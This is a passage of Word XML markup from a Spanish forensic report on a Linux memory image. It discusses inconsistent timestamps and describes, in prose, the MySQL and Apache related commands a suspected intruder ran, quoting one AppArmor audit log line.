                          <w:t xml:space="preserve">Ilustración </w:t>
                        </w:r>
                        <w:fldSimple w:instr=" SEQ Ilustración \* ARABIC ">
                          <w:r w:rsidR="00117A4E">
                            <w:rPr>
                              <w:noProof/>
                            </w:rPr>
                            <w:t>30</w:t>
                          </w:r>
                        </w:fldSimple>
                        <w:r>
                          <w:t xml:space="preserve">: </w:t>
                        </w:r>
                        <w:bookmarkStart w:id="80" w:name="_Toc155782597"/>
                        <w:r>
                          <w:t>Extracto comando linux_bash.</w:t>
                        </w:r>
                        <w:bookmarkEnd w:id="80"/>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <w10:wrap type="square" anchorx="margin"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="00AA7FAD">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>captura completa de los comandos ejecutados.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9763A4" w14:textId="01B31EF5" w:rsidR="00A5627C" w:rsidRPr="004C5DDC" w:rsidRDefault="00A5627C" w:rsidP="00AA7FAD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C5DDC">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">[Anexo </w:t>
      </w:r>
      <w:r w:rsidR="004C5DDC" w:rsidRPr="004C5DDC">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="004C5DDC" w:rsidRPr="004C5DDC">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> REF _Ref155656695 \h  \* MERGEFORMAT </w:instrText>
      </w:r>
      <w:r w:rsidR="004C5DDC" w:rsidRPr="004C5DDC">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidR="004C5DDC" w:rsidRPr="004C5DDC">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00117A4E" w:rsidRPr="00117A4E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t>XIV. Comando linux_bash.</w:t>
      </w:r>
      <w:r w:rsidR="004C5DDC" w:rsidRPr="004C5DDC">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="004C5DDC">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="291794A6" w14:textId="19577DEF" w:rsidR="00AA7FAD" w:rsidRPr="00AA7FAD" w:rsidRDefault="00AA7FAD" w:rsidP="00AA7FAD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA7FAD">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Relativo al código mostrado, cabe destacar que las fechas que marca la maquina como las calculadas en el apartado anterior, son totalmente erróneas entre sí, ya que por </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB53C1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>linux_dsmeg</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7FAD">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> calculamos fechas de mayo de 2019, sin </w:t>
      </w:r>
      <w:r w:rsidR="00A703AB" w:rsidRPr="00AA7FAD">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>embar</w:t>
      </w:r>
      <w:r w:rsidR="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>g</w:t>
      </w:r>
      <w:r w:rsidR="00A703AB" w:rsidRPr="00AA7FAD">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>o,</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7FAD">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> este comando data de 3 de enero de 2019, por otro lado, no creo que una persona humana, bot o proceso automatizado, escriba tan de seguido con esas fechas que marca el comando. Por lo que en principio parece descartable las fechas que indica este comando. Cabe destacar que posiblemente haya comandos del administrador relativos a la configuración y del atacante. A </w:t>
      </w:r>
      <w:r w:rsidR="00CB53C1" w:rsidRPr="00AA7FAD">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>continuación,</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7FAD">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> se detallan </w:t>
      </w:r>
      <w:r w:rsidR="00CB53C1" w:rsidRPr="00AA7FAD">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>comandos importantes</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7FAD">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> de las acciones realizadas que pueden afectar a la seguridad.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4746E28C" w14:textId="6420E181" w:rsidR="00F674A8" w:rsidRPr="00F674A8" w:rsidRDefault="00F674A8" w:rsidP="00F674A8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F674A8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="00F674A8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00F674A8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> REF _Ref155739911 \h  \* MERGEFORMAT </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00F674A8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidRPr="00F674A8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00117A4E" w:rsidRPr="00117A4E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:t>Referencia XVIII.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F674A8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00F674A8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73EDBA9D" w14:textId="0F122CA1" w:rsidR="00AA7FAD" w:rsidRPr="00307836" w:rsidRDefault="00AA7FAD" w:rsidP="00F674A8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Intenta una conexión con el usuario </w:t>
      </w:r>
      <w:r w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="000B7784">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>root: En sistemas Unix y Linux, el usuario con acceso total al sistema.</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>"</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> al servidor </w:t>
      </w:r>
      <w:r w:rsidRPr="00084B0B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>MySQL: Sistema de gestión de bases de datos relacional de código abierto.</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>"</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="021D17BE" w14:textId="071C3373" w:rsidR="00AA7FAD" w:rsidRPr="00307836" w:rsidRDefault="00AA7FAD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Se sitúa dentro del directorio de </w:t>
      </w:r>
      <w:r w:rsidRPr="00084B0B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Apache</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Apache: Software de servidor web de código abierto ampliamente utilizado.</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>"</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31248D7F" w14:textId="5420CE0B" w:rsidR="00AA7FAD" w:rsidRPr="00307836" w:rsidRDefault="00AA7FAD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Edita el fichero </w:t>
      </w:r>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>debian.cnf</w:t>
      </w:r>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> del servidor </w:t>
      </w:r>
      <w:r w:rsidRPr="00084B0B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>MySQL: Sistema de gestión de bases de datos relacional de código abierto.</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>"</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="625500D4" w14:textId="5047801B" w:rsidR="00AA7FAD" w:rsidRPr="00307836" w:rsidRDefault="00AA7FAD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Muestra todos los procesos referentes a </w:t>
      </w:r>
      <w:r w:rsidRPr="00084B0B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>MySQL: Sistema de gestión de bases de datos relacional de código abierto.</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>"</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="720D9EA1" w14:textId="2E4FE881" w:rsidR="00AA7FAD" w:rsidRPr="00307836" w:rsidRDefault="00AA7FAD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Muestra las últimas líneas del archivo </w:t>
      </w:r>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>Access.log.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8B699F" w14:textId="6D717466" w:rsidR="00AA7FAD" w:rsidRPr="00307836" w:rsidRDefault="00307836">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="00AA7FAD" w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">e mueve de directorio situándose en </w:t>
      </w:r>
      <w:r w:rsidR="00AA7FAD" w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>/var/html/www</w:t>
      </w:r>
      <w:r w:rsidR="00AA7FAD" w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, este directorio suele ser por defecto donde se alojan las páginas web.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="725FB839" w14:textId="72B065ED" w:rsidR="00AA7FAD" w:rsidRPr="00307836" w:rsidRDefault="00AA7FAD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Intenta matar el proceso 4539, digo intenta porque enlazando con el anterior estudio detectamos un denied en la </w:t>
      </w:r>
      <w:r w:rsidR="000C4414" w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>línea</w:t>
      </w:r>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>[22074531220184.22074] audit: type=1400 audit(1545415953.092:83): apparmor="DENIED" operation="open" profile="/usr/sbin/mysqld" name="/sys/devices/system/node/" pid=4539 comm="mysqld" requested_mask="r" denied_mask="r" fsuid=0 ouid=0</w:t>
      </w:r>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, la cual se encuentra dentro del estudio del comando del apartado </w:t>
      </w:r>
      <w:r w:rsidR="00527111" w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>linux_iomen</w:t>
      </w:r>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, donde indico lo siguiente </w:t>
      </w:r>
      <w:r w:rsidRPr="0098259F">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Denegación de servicio SQL 10 de mayo de 2019 a las 06:39:15.104327 UTC</w:t>
      </w:r>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2B5D23" w14:textId="79AE12A2" w:rsidR="00AA7FAD" w:rsidRPr="00307836" w:rsidRDefault="00307836">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="00AA7FAD" w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">e posiciona en </w:t>
      </w:r>
      <w:r w:rsidR="00AA7FAD" w:rsidRPr="0098259F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00AA7FAD" w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A1006C" w14:textId="48099D3B" w:rsidR="00AA7FAD" w:rsidRPr="00307836" w:rsidRDefault="00AA7FAD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Muestra de nuevo todos los procesos relativos a </w:t>
      </w:r>
      <w:r w:rsidRPr="001A130A">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
